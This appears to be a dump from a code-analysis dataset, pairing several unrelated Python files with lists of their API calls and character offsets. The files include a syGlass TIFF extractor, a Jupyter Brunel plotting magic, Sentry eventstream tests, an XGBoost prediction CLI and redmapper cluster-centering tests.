((4682, 4704), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4702, 4704), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((679, 701), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (699, 701), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((1130, 1152), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (1150, 1152), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((1328, 1350), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (1348, 1350), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((1906, 1928), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (1926, 1928), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2601, 2623), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2621, 2623), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n')] |
import os
import sys
import syglass as sy
from syglass import pyglass
import numpy as np
import tifffile
import subprocess
def extract(projectPath):
project = sy.get_project(projectPath)
head, tail = os.path.split(projectPath)
# Get a dictionary showing the number of blocks in each level
#codebreak()
resolution_map = project.get_resolution_map()
# Calculate the index of the highest resolution level
max_resolution_level = len(resolution_map) - 1
# Determine the number of blocks in this level
block_count = resolution_map[max_resolution_level]
# get size of project
total_size = project.get_size(max_resolution_level)
xsize = total_size[1]
ysize = total_size[2]
zslices = total_size[0]
dimensions = np.asarray([1,xsize, ysize])
offset = np.asarray([0,0,0])
os.chdir(os.path.dirname(projectPath))
for slice in range(zslices):
s = str(slice).zfill(5)
offset[0] = slice
block = project.get_custom_block(0, max_resolution_level, offset, dimensions)
data = block.data
print(s + ".tiff")
tifffile.imwrite(tail + "_" + s + ".tiff", data)
subprocess.run(['explorer', head])
def main():
print("Image Extractor, by <NAME>")
print("Attempts to extract the original data volume from a syGlass project")
print("and write it to a series of TIFF files")
print("---------------------------------------")
print("Usage: Highlight a project and use the Script Launcher in syGlass.")
print("---------------------------------------")
print(sys.argv)
for syGlassProjectPath in sys.argv:
print("Extracting project from: " + syGlassProjectPath)
extract(syGlassProjectPath)
if __name__== "__main__":
main() | [
"subprocess.run",
"numpy.asarray",
"os.path.split",
"os.path.dirname",
"syglass.get_project",
"tifffile.imwrite"
] | [((162, 189), 'syglass.get_project', 'sy.get_project', (['projectPath'], {}), '(projectPath)\n', (176, 189), True, 'import syglass as sy\n'), ((204, 230), 'os.path.split', 'os.path.split', (['projectPath'], {}), '(projectPath)\n', (217, 230), False, 'import os\n'), ((736, 765), 'numpy.asarray', 'np.asarray', (['[1, xsize, ysize]'], {}), '([1, xsize, ysize])\n', (746, 765), True, 'import numpy as np\n'), ((775, 796), 'numpy.asarray', 'np.asarray', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (785, 796), True, 'import numpy as np\n'), ((1084, 1118), 'subprocess.run', 'subprocess.run', (["['explorer', head]"], {}), "(['explorer', head])\n", (1098, 1118), False, 'import subprocess\n'), ((805, 833), 'os.path.dirname', 'os.path.dirname', (['projectPath'], {}), '(projectPath)\n', (820, 833), False, 'import os\n'), ((1034, 1082), 'tifffile.imwrite', 'tifffile.imwrite', (["(tail + '_' + s + '.tiff')", 'data'], {}), "(tail + '_' + s + '.tiff', data)\n", (1050, 1082), False, 'import tifffile\n')] |
# Lee el fichero y procésalo de tal manera que sea capaz de mostrar
# la temperatura máxima para una ciudad dada. Esa ciudad la debe poder
# recibir como un argumento de entrada. Si la ciudad no existe, se deberá
# manejar a través de una excepción.
import csv
provincia = input('Diga el nombre de la ciudad: ')
with open("climatologia.csv", encoding="utf-8") as csvfile:
reader = csv.reader(csvfile, delimiter=",")
try:
for row in reader:
if (provincia == row[2]):
temperatura_maxima = row[3]
print(f"provincia: '{provincia}' con temperatura maxima de {temperatura_maxima}")
else:
raise Exception("No existe ninguna ciudad: " + provincia)
except Exception as cityNotFound:
print(cityNotFound)
| [
"csv.reader"
] | [((389, 423), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (399, 423), False, 'import csv\n')] |
# Copyright (c) 2015 IBM Corporation and others.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from IPython.core.magic import Magics, magics_class, line_magic, cell_magic, line_cell_magic
import pandas as pd
import brunel.brunel_main as brunel
ipy = get_ipython()
@magics_class
class BrunelMagics(Magics):
@line_cell_magic
def brunel(self, line, cell=None):
"Magic that works both as %brunel and as %%brunel"
datas = self.find_dataframes()
# print("Found dataframes", list(datas.keys()))
if cell is not None:
line = line + ' ' + cell.replace('\n',' ')
# print ("Command =", line)
data = None
height = 400
width = 500
output = 'd3'
online_js = False
parts = line.split('::')
action = parts[0].strip()
datasets_in_brunel = brunel.get_dataset_names(action)
self.cache_data(datasets_in_brunel,datas)
if len(parts) > 2:
raise ValueError("Only one ':' allowed in brunel magic. Format is 'ACTION : key=value, ...'")
if len(parts) > 1:
extras = parts[1].strip()
dataName = self.find_term('data', extras)
if dataName is not None:
try:
data = datas[dataName]
except:
raise ValueError("Could not find pandas DataFrame named '" + dataName + "'")
width = self.find_term('width', extras, width)
height = self.find_term('height', extras, height)
online_js = self.find_term('online_js', extras, online_js)
if data is None and len(datasets_in_brunel) == 0:
data = self.best_match(self.get_vars(action), list(datas.values()))
return brunel.display(action, data, width, height, online_js)
def cache_data(self, datasets_in_brunel, dataframes):
for data_name in datasets_in_brunel:
try:
data = dataframes[data_name]
brunel.cacheData(data_name, brunel.to_csv(data))
except:
pass
def find_term(self, key, string, default=None):
for expr in string.split(','):
terms = expr.split('=')
if len(terms) != 2:
raise ValueError("Bad format for key=value pair: " + expr)
if key == terms[0].strip().lower():
return terms[1].strip()
return default
def find_dataframes(self):
result = {}
for name in list(self.shell.user_ns.keys()):
v = self.shell.user_ns[name]
if name[0] != '_' and isinstance(v, pd.DataFrame):
result[name] = v
return result
def get_vars(self, line):
"Search for the internal bits of 'x(a,b)' and return as ['a','b']"
result = []
for part in line.split('('):
p = part.find(')')
if p > 0:
inner = part[:p].split(',')
for term in inner:
result.append(term.strip())
return result
def best_match(self, variables, datas):
# print("Searching for", variables, "in", len(datas), "dataframes")
all = [[self.match(variables, v.columns.values), v] for v in datas]
all.sort(key=lambda x: x[0])
return all[0][1]
def match(self, names1, names2):
n = 0
for i in names1:
for j in names2:
if str(i).lower() == str(j).lower(): n += 1
return -n
# Register with IPython
ipy.register_magics(BrunelMagics)
| [
"brunel.brunel_main.display",
"brunel.brunel_main.get_dataset_names",
"brunel.brunel_main.to_csv"
] | [((1351, 1383), 'brunel.brunel_main.get_dataset_names', 'brunel.get_dataset_names', (['action'], {}), '(action)\n', (1375, 1383), True, 'import brunel.brunel_main as brunel\n'), ((2254, 2308), 'brunel.brunel_main.display', 'brunel.display', (['action', 'data', 'width', 'height', 'online_js'], {}), '(action, data, width, height, online_js)\n', (2268, 2308), True, 'import brunel.brunel_main as brunel\n'), ((2519, 2538), 'brunel.brunel_main.to_csv', 'brunel.to_csv', (['data'], {}), '(data)\n', (2532, 2538), True, 'import brunel.brunel_main as brunel\n')] |
#!/usr/bin/python
import fileinput
import json
url_base = "https://dds.cr.usgs.gov/srtm/version2_1/SRTM3"
regions = [
"Africa",
"Australia",
"Eurasia",
"Islands",
"North_America",
"South_America",
]
srtm_dict = {}
srtm_directory = "srtm.json"
for region in regions:
print("Processing", region)
f = fileinput.input(region)
for name in f:
name = name.strip()
url = url_base + "/" + region + "/" + name
key = name.replace(".hgt.zip", "")
srtm_dict[key] = url
try:
print("Writing", srtm_directory)
f = open(srtm_directory, "w")
json.dump(srtm_dict, f, indent=2, sort_keys=True)
f.close()
except IOError as e:
print("Save srtm_dict(): I/O error({0}): {1}".format(e.errno, e.strerror))
| [
"fileinput.input",
"json.dump"
] | [((336, 359), 'fileinput.input', 'fileinput.input', (['region'], {}), '(region)\n', (351, 359), False, 'import fileinput\n'), ((611, 660), 'json.dump', 'json.dump', (['srtm_dict', 'f'], {'indent': '(2)', 'sort_keys': '(True)'}), '(srtm_dict, f, indent=2, sort_keys=True)\n', (620, 660), False, 'import json\n')] |
from __future__ import absolute_import
from datetime import datetime, timedelta
import six
import time
import logging
from sentry.utils.compat.mock import patch, Mock
from sentry.event_manager import EventManager
from sentry.eventstream.kafka import KafkaEventStream
from sentry.eventstream.snuba import SnubaEventStream
from sentry.testutils import SnubaTestCase, TestCase
from sentry.utils import snuba, json
class SnubaEventStreamTest(TestCase, SnubaTestCase):
def setUp(self):
super(SnubaEventStreamTest, self).setUp()
self.kafka_eventstream = KafkaEventStream()
self.kafka_eventstream.producer = Mock()
def __build_event(self, timestamp):
raw_event = {
"event_id": "a" * 32,
"message": "foo",
"timestamp": time.mktime(timestamp.timetuple()),
"level": logging.ERROR,
"logger": "default",
"tags": [],
}
manager = EventManager(raw_event)
manager.normalize()
return manager.save(self.project.id)
def __produce_event(self, *insert_args, **insert_kwargs):
# pass arguments on to Kafka EventManager
self.kafka_eventstream.insert(*insert_args, **insert_kwargs)
produce_args, produce_kwargs = list(self.kafka_eventstream.producer.produce.call_args)
assert not produce_args
assert produce_kwargs["topic"] == "events"
assert produce_kwargs["key"] == six.text_type(self.project.id)
version, type_, payload1, payload2 = json.loads(produce_kwargs["value"])
assert version == 2
assert type_ == "insert"
# insert what would have been the Kafka payload directly
# into Snuba, expect an HTTP 200 and for the event to now exist
snuba_eventstream = SnubaEventStream()
snuba_eventstream._send(self.project.id, "insert", (payload1, payload2))
@patch("sentry.eventstream.insert")
def test(self, mock_eventstream_insert):
now = datetime.utcnow()
event = self.__build_event(now)
# verify eventstream was called by EventManager
insert_args, insert_kwargs = list(mock_eventstream_insert.call_args)
assert not insert_args
assert insert_kwargs == {
"event": event,
"group": event.group,
"is_new_group_environment": True,
"is_new": True,
"is_regression": False,
"primary_hash": "acbd18db4cc2f85cedef654fccc4a4d8",
"skip_consume": False,
"received_timestamp": event.data["received"],
}
self.__produce_event(*insert_args, **insert_kwargs)
assert (
snuba.query(
start=now - timedelta(days=1),
end=now + timedelta(days=1),
groupby=["project_id"],
filter_keys={"project_id": [self.project.id]},
).get(self.project.id, 0)
== 1
)
@patch("sentry.eventstream.insert")
def test_issueless(self, mock_eventstream_insert):
now = datetime.utcnow()
event = self.__build_event(now)
event.group_id = None
insert_args = ()
insert_kwargs = {
"event": event,
"group": None,
"is_new_group_environment": True,
"is_new": True,
"is_regression": False,
"primary_hash": "acbd18db4cc2f85cedef654fccc4a4d8",
"skip_consume": False,
"received_timestamp": event.data["received"],
}
self.__produce_event(*insert_args, **insert_kwargs)
result = snuba.raw_query(
start=now - timedelta(days=1),
end=now + timedelta(days=1),
selected_columns=["event_id", "group_id"],
groupby=None,
filter_keys={"project_id": [self.project.id], "event_id": [event.event_id]},
)
assert len(result["data"]) == 1
assert result["data"][0]["group_id"] is None
| [
"datetime.datetime.utcnow",
"datetime.timedelta",
"sentry.utils.compat.mock.patch",
"sentry.eventstream.kafka.KafkaEventStream",
"sentry.utils.compat.mock.Mock",
"sentry.eventstream.snuba.SnubaEventStream",
"six.text_type",
"sentry.utils.json.loads",
"sentry.event_manager.EventManager"
] | [((1894, 1928), 'sentry.utils.compat.mock.patch', 'patch', (['"""sentry.eventstream.insert"""'], {}), "('sentry.eventstream.insert')\n", (1899, 1928), False, 'from sentry.utils.compat.mock import patch, Mock\n'), ((2954, 2988), 'sentry.utils.compat.mock.patch', 'patch', (['"""sentry.eventstream.insert"""'], {}), "('sentry.eventstream.insert')\n", (2959, 2988), False, 'from sentry.utils.compat.mock import patch, Mock\n'), ((573, 591), 'sentry.eventstream.kafka.KafkaEventStream', 'KafkaEventStream', ([], {}), '()\n', (589, 591), False, 'from sentry.eventstream.kafka import KafkaEventStream\n'), ((634, 640), 'sentry.utils.compat.mock.Mock', 'Mock', ([], {}), '()\n', (638, 640), False, 'from sentry.utils.compat.mock import patch, Mock\n'), ((950, 973), 'sentry.event_manager.EventManager', 'EventManager', (['raw_event'], {}), '(raw_event)\n', (962, 973), False, 'from sentry.event_manager import EventManager\n'), ((1525, 1560), 'sentry.utils.json.loads', 'json.loads', (["produce_kwargs['value']"], {}), "(produce_kwargs['value'])\n", (1535, 1560), False, 'from sentry.utils import snuba, json\n'), ((1788, 1806), 'sentry.eventstream.snuba.SnubaEventStream', 'SnubaEventStream', ([], {}), '()\n', (1804, 1806), False, 'from sentry.eventstream.snuba import SnubaEventStream\n'), ((1988, 2005), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2003, 2005), False, 'from datetime import datetime, timedelta\n'), ((3058, 3075), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (3073, 3075), False, 'from datetime import datetime, timedelta\n'), ((1448, 1478), 'six.text_type', 'six.text_type', (['self.project.id'], {}), '(self.project.id)\n', (1461, 1478), False, 'import six\n'), ((3649, 3666), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (3658, 3666), False, 'from datetime import datetime, timedelta\n'), ((3690, 3707), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (3699, 3707), False, 'from datetime import datetime, timedelta\n'), ((2716, 2733), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2725, 2733), False, 'from datetime import datetime, timedelta\n'), ((2761, 2778), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2770, 2778), False, 'from datetime import datetime, timedelta\n')] |
"""User specific settings."""
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams['font.size'] = 7
mpl.rcParams['pdf.fonttype'] = 42
mpl.rcParams['ps.fonttype'] = 42
mpl.rcParams['font.family'] = 'arial'
mpl.rcParams['mathtext.fontset'] = 'stix'
seqcmap = mpl.cm.cool_r
try:
import seaborn as sns
plt.rcParams['axes.prop_cycle'] = plt.cycler(color=sns.color_palette('deep'))
# seqcmap = sns.color_palette("crest_r", as_cmap=True)
except ImportError as e:
print('Seaborn not available, default to matplotlib color scheme')
use_torch = True
cluster_path = '/share/ctn/users/gy2259/olfaction_evolution'
| [
"seaborn.color_palette"
] | [((377, 402), 'seaborn.color_palette', 'sns.color_palette', (['"""deep"""'], {}), "('deep')\n", (394, 402), True, 'import seaborn as sns\n')] |
#!/bin/python3
# author: <NAME>
import tests
tests.fix_paths()
import yaml
from unittest import TestCase
from cihpc.cfg.config import global_configuration
from cihpc.common.utils import extend_yaml
repeat_yaml = '''
foo: !repeat a 5
'''
range_yaml = '''
foo: !range 1 5
bar: !range 1 2 6
'''
sh_yaml = '''
foo: !readfile yaml/foo.txt
'''
class TestExtendYaml(TestCase):
def test_extend(self):
extend_yaml.extend()
self.assertIn('!range', yaml.Loader.yaml_constructors)
self.assertIn('!repeat', yaml.Loader.yaml_constructors)
self.assertIn('!readfile', yaml.Loader.yaml_constructors)
self.assertIn('!readyaml', yaml.Loader.yaml_constructors)
def test_repeat(self):
extend_yaml.extend()
result = yaml.load(repeat_yaml)
self.assertEqual(result.get('foo'), 'a'*5)
result = yaml.load(range_yaml)
self.assertTupleEqual(tuple(result.get('foo')), tuple(range(1, 5)))
self.assertTupleEqual(tuple(result.get('bar')), tuple(range(1, 2, 6)))
global_configuration.project_cfg_dir = tests.__dir__
result = yaml.load(sh_yaml)
self.assertEqual(result.get('foo'), 'top-secret')
| [
"yaml.load",
"cihpc.common.utils.extend_yaml.extend",
"tests.fix_paths"
] | [((48, 65), 'tests.fix_paths', 'tests.fix_paths', ([], {}), '()\n', (63, 65), False, 'import tests\n'), ((416, 436), 'cihpc.common.utils.extend_yaml.extend', 'extend_yaml.extend', ([], {}), '()\n', (434, 436), False, 'from cihpc.common.utils import extend_yaml\n'), ((732, 752), 'cihpc.common.utils.extend_yaml.extend', 'extend_yaml.extend', ([], {}), '()\n', (750, 752), False, 'from cihpc.common.utils import extend_yaml\n'), ((771, 793), 'yaml.load', 'yaml.load', (['repeat_yaml'], {}), '(repeat_yaml)\n', (780, 793), False, 'import yaml\n'), ((863, 884), 'yaml.load', 'yaml.load', (['range_yaml'], {}), '(range_yaml)\n', (872, 884), False, 'import yaml\n'), ((1120, 1138), 'yaml.load', 'yaml.load', (['sh_yaml'], {}), '(sh_yaml)\n', (1129, 1138), False, 'import yaml\n')] |
import os
import sys
from dataclasses import dataclass
import click
import numpy as np
import xgboost as xgb
from rich import print, traceback
WD = os.path.dirname(__file__)
@click.command()
@click.option('-i', '--input', required=True, type=str, help='Path to data file to predict.')
@click.option('-m', '--model', type=str, help='Path to an already trained XGBoost model. If not passed a default model will be loaded.')
@click.option('-c/-nc', '--cuda/--no-cuda', type=bool, default=False, help='Whether to enable cuda or not')
@click.option('-o', '--output', type=str, help='Path to write the output to')
def main(input: str, model: str, cuda: bool, output: str):
"""Command-line interface for {{ cookiecutter.project_name }}"""
print(r"""[bold blue]
{{ cookiecutter.project_name }}
""")
print('[bold blue]Run [green]{{ cookiecutter.project_name }} --help [blue]for an overview of all commands\n')
if not model:
model = get_xgboost_model(f'{WD}/models/xgboost_test_model.xgb')
else:
model = get_xgboost_model(model)
if cuda:
model.set_param({'predictor': 'gpu_predictor'})
print('[bold blue] Parsing data')
data_to_predict = parse_data_to_predict(input)
print('[bold blue] Performing predictions')
predictions = np.round(model.predict(data_to_predict.DM))
print(predictions)
if output:
print(f'[bold blue]Writing predictions to {output}')
write_results(predictions, output)
@dataclass
class Dataset:
X: np.ndarray
y: list
DM: xgb.DMatrix
gene_names: list
sample_names: list
def parse_data_to_predict(path_to_data_to_predict: str) -> Dataset:
"""
Parses the data to predict and returns a full Dataset include the DMatrix
:param path_to_data_to_predict: Path to the data on which predictions should be performed on
"""
X = []
y = []
gene_names = []
sample_names = []
with open(path_to_data_to_predict, "r") as file:
all_runs_info = next(file).split("\n")[0].split("\t")[2:]
for run_info in all_runs_info:
split_info = run_info.split("_")
y.append(int(split_info[0]))
sample_names.append(split_info[1])
for line in file:
split = line.split("\n")[0].split("\t")
X.append([float(x) for x in split[2:]])
gene_names.append(split[:2])
X = [list(i) for i in zip(*X)]
X_np = np.array(X)
DM = xgb.DMatrix(X_np, label=y)
return Dataset(X_np, y, DM, gene_names, sample_names)
def write_results(predictions: np.ndarray, path_to_write_to) -> None:
"""
Writes the predictions into a human readable file.
:param predictions: Predictions as a numpy array
:param path_to_write_to: Path to write the predictions to
"""
np.savetxt(path_to_write_to, predictions, delimiter=',')
def get_xgboost_model(path_to_xgboost_model: str):
"""
Fetches the model of choice and creates a booster from it.
:param path_to_xgboost_model: Path to the xgboost model1
"""
model = xgb.Booster()
model.load_model(os.path.abspath(path_to_xgboost_model))
return model
if __name__ == "__main__":
traceback.install()
sys.exit(main()) # pragma: no cover
| [
"rich.traceback.install",
"click.option",
"os.path.dirname",
"rich.print",
"numpy.array",
"xgboost.Booster",
"numpy.savetxt",
"os.path.abspath",
"xgboost.DMatrix",
"click.command"
] | [((150, 175), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (165, 175), False, 'import os\n'), ((179, 194), 'click.command', 'click.command', ([], {}), '()\n', (192, 194), False, 'import click\n'), ((196, 293), 'click.option', 'click.option', (['"""-i"""', '"""--input"""'], {'required': '(True)', 'type': 'str', 'help': '"""Path to data file to predict."""'}), "('-i', '--input', required=True, type=str, help=\n 'Path to data file to predict.')\n", (208, 293), False, 'import click\n'), ((290, 435), 'click.option', 'click.option', (['"""-m"""', '"""--model"""'], {'type': 'str', 'help': '"""Path to an already trained XGBoost model. If not passed a default model will be loaded."""'}), "('-m', '--model', type=str, help=\n 'Path to an already trained XGBoost model. If not passed a default model will be loaded.'\n )\n", (302, 435), False, 'import click\n'), ((427, 538), 'click.option', 'click.option', (['"""-c/-nc"""', '"""--cuda/--no-cuda"""'], {'type': 'bool', 'default': '(False)', 'help': '"""Whether to enable cuda or not"""'}), "('-c/-nc', '--cuda/--no-cuda', type=bool, default=False, help=\n 'Whether to enable cuda or not')\n", (439, 538), False, 'import click\n'), ((535, 611), 'click.option', 'click.option', (['"""-o"""', '"""--output"""'], {'type': 'str', 'help': '"""Path to write the output to"""'}), "('-o', '--output', type=str, help='Path to write the output to')\n", (547, 611), False, 'import click\n'), ((745, 818), 'rich.print', 'print', (['"""[bold blue]\n {{ cookiecutter.project_name }}\n """'], {}), '("""[bold blue]\n {{ cookiecutter.project_name }}\n """)\n', (750, 818), False, 'from rich import print, traceback\n'), ((825, 947), 'rich.print', 'print', (['"""[bold blue]Run [green]{{ cookiecutter.project_name }} --help [blue]for an overview of all commands\n"""'], {}), '(\n """[bold blue]Run [green]{{ cookiecutter.project_name }} --help [blue]for an overview of all commands\n"""\n )\n', (830, 947), False, 'from rich import print, traceback\n'), ((1150, 1183), 'rich.print', 'print', (['"""[bold blue] Parsing data"""'], {}), "('[bold blue] Parsing data')\n", (1155, 1183), False, 'from rich import print, traceback\n'), ((1239, 1282), 'rich.print', 'print', (['"""[bold blue] Performing predictions"""'], {}), "('[bold blue] Performing predictions')\n", (1244, 1282), False, 'from rich import print, traceback\n'), ((1349, 1367), 'rich.print', 'print', (['predictions'], {}), '(predictions)\n', (1354, 1367), False, 'from rich import print, traceback\n'), ((2444, 2455), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (2452, 2455), True, 'import numpy as np\n'), ((2465, 2491), 'xgboost.DMatrix', 'xgb.DMatrix', (['X_np'], {'label': 'y'}), '(X_np, label=y)\n', (2476, 2491), True, 'import xgboost as xgb\n'), ((2813, 2869), 'numpy.savetxt', 'np.savetxt', (['path_to_write_to', 'predictions'], {'delimiter': '""","""'}), "(path_to_write_to, predictions, delimiter=',')\n", (2823, 2869), True, 'import numpy as np\n'), ((3075, 3088), 'xgboost.Booster', 'xgb.Booster', ([], {}), '()\n', (3086, 3088), True, 'import xgboost as xgb\n'), ((3201, 3220), 'rich.traceback.install', 'traceback.install', ([], {}), '()\n', (3218, 3220), False, 'from rich import print, traceback\n'), ((1391, 1443), 'rich.print', 'print', (['f"""[bold blue]Writing predictions to {output}"""'], {}), "(f'[bold blue]Writing predictions to {output}')\n", (1396, 1443), False, 'from rich import print, traceback\n'), ((3110, 3148), 'os.path.abspath', 'os.path.abspath', (['path_to_xgboost_model'], {}), '(path_to_xgboost_model)\n', (3125, 3148), False, 'import os\n')] |
from __future__ import division, absolute_import, print_function
from past.builtins import xrange
import unittest
import numpy.testing as testing
import numpy as np
import fitsio
import os
from numpy import random
from redmapper import Cluster
from redmapper import Configuration
from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite
from redmapper import GalaxyCatalog
from redmapper import RedSequenceColorPar
from redmapper import Background
from redmapper import ZredBackground
from redmapper import ZlambdaCorrectionPar
class CenteringTestCase(unittest.TestCase):
"""
Test application of the centering models (CenteringWcenZred, CenteringBCG,
CenteringRandom, CenteringRandomSatelliate).
"""
def test_wcenzred(self):
"""
Test running of CenteringWcenZred.
"""
file_path = 'data_for_tests'
cluster = self._setup_cluster()
tempcat = fitsio.read(os.path.join(file_path, 'test_wcen_zred_data.fit'))
corr_filename = 'test_dr8_zlambdacorr.fit'
zlambda_corr = ZlambdaCorrectionPar(os.path.join(file_path, 'test_dr8_zlambdacorr.fit'), zlambda_pivot=30.0)
zlambda_corr = ZlambdaCorrectionPar(file_path + '/' + corr_filename, zlambda_pivot=30.0)
# And the meat of it...
cent = CenteringWcenZred(cluster, zlambda_corr=zlambda_corr)
cent.find_center()
testing.assert_almost_equal(cent.p_cen, tempcat[0]['PCEN'][tempcat[0]['GOOD']], 5)
testing.assert_almost_equal(cent.q_cen, tempcat[0]['QCEN'][tempcat[0]['GOOD']], 4)
testing.assert_almost_equal(cent.p_sat, tempcat[0]['PSAT'], 4)
testing.assert_almost_equal(cent.p_fg, tempcat[0]['PFG'], 4)
testing.assert_array_equal(cent.index, tempcat[0]['USE'][tempcat[0]['GOOD']])
def test_bcg(self):
"""
Test running of CenteringBcg.
"""
cluster = self._setup_cluster()
cent = CenteringBCG(cluster)
cent.find_center()
self.assertEqual(cent.maxind, 72)
self.assertEqual(cent.ngood, 1)
testing.assert_almost_equal(cent.ra, 150.55890608)
testing.assert_almost_equal(cent.dec, 20.53794937)
testing.assert_almost_equal(cent.p_cen[0], 1.0)
testing.assert_almost_equal(cent.q_cen[0], 1.0)
testing.assert_almost_equal(cent.p_sat[0], 0.0)
def test_random(self):
"""
Test running of CenteringRandom.
"""
random.seed(seed=12345)
cluster = self._setup_cluster()
cent = CenteringRandom(cluster)
cent.find_center()
self.assertEqual(cent.maxind, -1)
self.assertEqual(cent.ngood, 1)
testing.assert_almost_equal(cent.ra[0], 150.57049502423266)
testing.assert_almost_equal(cent.dec[0], 20.604521924053167)
testing.assert_almost_equal(cent.p_cen[0], 1.0)
testing.assert_almost_equal(cent.q_cen[0], 1.0)
testing.assert_almost_equal(cent.p_sat[0], 0.0)
def test_randsat(self):
"""
Test running of CenteringRandomSatellite.
"""
random.seed(seed=12345)
cluster = self._setup_cluster()
cent = CenteringRandomSatellite(cluster)
cent.find_center()
# Confirmed that the distribution is correct, this just checks for regression
self.assertEqual(cent.maxind, 721)
self.assertEqual(cent.ngood, 1)
testing.assert_almost_equal(cent.ra[0], 150.67510227)
testing.assert_almost_equal(cent.dec[0], 20.48011092)
testing.assert_almost_equal(cent.p_cen[0], 1.0)
testing.assert_almost_equal(cent.q_cen[0], 1.0)
testing.assert_almost_equal(cent.p_sat[0], 0.0)
def _setup_cluster(self):
"""
Set up the cluster to run through the centering code.
"""
file_path = 'data_for_tests'
cluster = Cluster()
cluster.config = Configuration(os.path.join(file_path, 'testconfig.yaml'))
tempcat = fitsio.read(os.path.join(file_path, 'test_wcen_zred_data.fit'))
temp_neighbors = np.zeros(tempcat[0]['RAS'].size,
dtype = [('RA', 'f8'),
('DEC', 'f8'),
('DIST', 'f4'),
('R', 'f4'),
('P', 'f4'),
('PFREE', 'f4'),
('PMEM', 'f4'),
('MAG', 'f4', 5),
('MAG_ERR', 'f4', 5),
('REFMAG', 'f4'),
('REFMAG_ERR', 'f4'),
('CHISQ', 'f4'),
('ZRED', 'f4'),
('ZRED_E', 'f4'),
('ZRED_CHISQ', 'f4')])
temp_neighbors['RA'] = tempcat[0]['RAS']
temp_neighbors['DEC'] = tempcat[0]['DECS']
temp_neighbors['R'] = tempcat[0]['R']
temp_neighbors['P'] = tempcat[0]['PVALS']
temp_neighbors['PFREE'] = tempcat[0]['WVALS']
temp_neighbors['PMEM'] = tempcat[0]['WTVALS']
temp_neighbors['REFMAG'] = tempcat[0]['REFMAG_TOTAL']
temp_neighbors['ZRED'] = tempcat[0]['GZREDS']
temp_neighbors['ZRED_E'] = tempcat[0]['GZREDE']
temp_neighbors['ZRED_CHISQ'] = tempcat[0]['GCHISQ']
temp_neighbors['DIST'] = tempcat[0]['R'] / (np.radians(1.) * cluster.config.cosmo.Da(0, tempcat[0]['ZCLUSTER']))
neighbors = GalaxyCatalog(temp_neighbors)
cluster.set_neighbors(neighbors)
zred_filename = 'test_dr8_pars.fit'
cluster.zredstr = RedSequenceColorPar(os.path.join(file_path, 'test_dr8_pars.fit'), fine=True, zrange=[0.25, 0.35])
cluster.bkg = Background(os.path.join(file_path, 'test_bkg.fit'))
cluster.zredbkg = ZredBackground(os.path.join(file_path, 'test_bkg.fit'))
cluster.redshift = tempcat[0]['ZCLUSTER']
cluster.ra = tempcat[0]['RAC']
cluster.dec = tempcat[0]['DECC']
cluster.r_lambda = 1.0 * (tempcat[0]['LAMBDA'] / 100.0)**0.2
cluster.Lambda = tempcat[0]['LAMBDA']
cluster.scaleval = tempcat[0]['SCALEVAL']
return cluster
if __name__=='__main__':
unittest.main()
| [
"numpy.radians",
"redmapper.Cluster",
"redmapper.CenteringWcenZred",
"os.path.join",
"numpy.testing.assert_almost_equal",
"numpy.zeros",
"redmapper.ZlambdaCorrectionPar",
"redmapper.CenteringRandom",
"redmapper.CenteringBCG",
"numpy.random.seed",
"unittest.main",
"redmapper.GalaxyCatalog",
"... | [((6462, 6477), 'unittest.main', 'unittest.main', ([], {}), '()\n', (6475, 6477), False, 'import unittest\n'), ((1209, 1282), 'redmapper.ZlambdaCorrectionPar', 'ZlambdaCorrectionPar', (["(file_path + '/' + corr_filename)"], {'zlambda_pivot': '(30.0)'}), "(file_path + '/' + corr_filename, zlambda_pivot=30.0)\n", (1229, 1282), False, 'from redmapper import ZlambdaCorrectionPar\n'), ((1332, 1385), 'redmapper.CenteringWcenZred', 'CenteringWcenZred', (['cluster'], {'zlambda_corr': 'zlambda_corr'}), '(cluster, zlambda_corr=zlambda_corr)\n', (1349, 1385), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((1422, 1509), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen', "tempcat[0]['PCEN'][tempcat[0]['GOOD']]", '(5)'], {}), "(cent.p_cen, tempcat[0]['PCEN'][tempcat[0][\n 'GOOD']], 5)\n", (1449, 1509), True, 'import numpy.testing as testing\n'), ((1513, 1600), 'numpy.testing.assert_almost_equal', 